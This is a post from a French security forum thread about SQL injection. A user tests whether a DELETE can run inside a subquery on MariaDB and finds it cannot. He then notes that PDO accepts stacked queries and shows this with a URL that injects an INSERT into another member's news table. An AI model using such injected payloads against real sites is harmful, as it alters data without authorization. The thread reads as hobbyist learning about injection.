Injection SQL

Note de ce sujet :

Moyenne : 0 (0 vote(s))
1
2
3
4
5

Affichage linéaire

Injection SQL

28-07-2013, 18h23 (Modification du message : 28-07-2013, 18h25 par supersnail.)

Message : #11

supersnail Hors ligne

Éleveur d'ornithorynques

Messages : 1,609
Sujets : 71
Points: 465
Inscription : Jan 2012

RE: Injection SQL

(28-07-2013, 15h39)b0fh a écrit : Salut,

La clause UNION n'accepte que des requêtes SELECT, tu ne peux pas l'utiliser pour faire un DELETE.

Tu peux en revanche utiliser un DELETE dans une subquery, quelque chose comme

Code SQL :

SELECT ... FROM blah WHERE id = (DELETE FROM ... )

Personnellement, mysql m'envoie cordialement chier en utilisant une subquery comme ça...

Code :
mysql> create table wtf (id int, name varchar (255), val varchar(255));

Query OK, 0 rows affected (0.10 sec)

mysql> INSERT INTO wtf (name, val) VALUES ('tg', 'suce');

Query OK, 1 row affected (0.04 sec)

mysql> INSERT INTO wtf (name, val) VALUES ('dssdfsdf', 'dsfdse');

Query OK, 1 row affected (0.03 sec)

mysql> select * from wtf where id = (DELETE FROM wtf WHERE id=1);

ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'DELETE FROM wtf WHERE id=1)' at line 1

Edit: par contre les stacked queries ont l'air d'être supportées par PDO ...

cf: cr0a://acip.alwaysdata.net/?id=1;%20insert%20into%20news%20%28title,%20content%29%20values%20%28%27omgwtf%27,%20%27bbq%27%29;

Mon blog

Code :
push esp ; dec eax ; inc ebp ; and [edi+0x41],al ; dec ebp ; inc ebp

"VIM est merveilleux" © supersnail

Site web

(0)

(0) Répondre

« Sujet précédent | Sujet suivant »

Messages dans ce sujet

Injection SQL - par acip - 27-07-2013, 19h30

RE: Injection SQL - par acip - 28-07-2013, 11h39

RE: Injection SQL - par Hypnoze57 - 28-07-2013, 13h25

RE: Injection SQL - par notfound - 28-07-2013, 14h04

RE: Injection SQL - par acip - 28-07-2013, 15h24

RE: Injection SQL - par gruik - 28-07-2013, 15h30

RE: Injection SQL - par b0fh - 28-07-2013, 15h39

RE: Injection SQL - par supersnail - 28-07-2013, 18h23

RE: Injection SQL - par acip - 28-07-2013, 16h25

RE: Injection SQL - par gruik - 28-07-2013, 20h30

RE: Injection SQL - par b0fh - 28-07-2013, 16h27

RE: Injection SQL - par Hypnoze57 - 28-07-2013, 17h12

RE: Injection SQL - par notfound - 28-07-2013, 18h27

Sujets apparemment similaires…
Sujet		Auteur	Réponses	Affichages	Dernier message
	Injection SQL Hard Filtre	oxame	4	485	01-09-2012, 17h59 Dernier message: Luxerails

Voir une version imprimable

Atteindre :

Utilisateur(s) parcourant ce sujet : 1 visiteur(s)

Identifiant Mot de passe
S’enregistrer \| Mot de passe oublié ? Se rappeler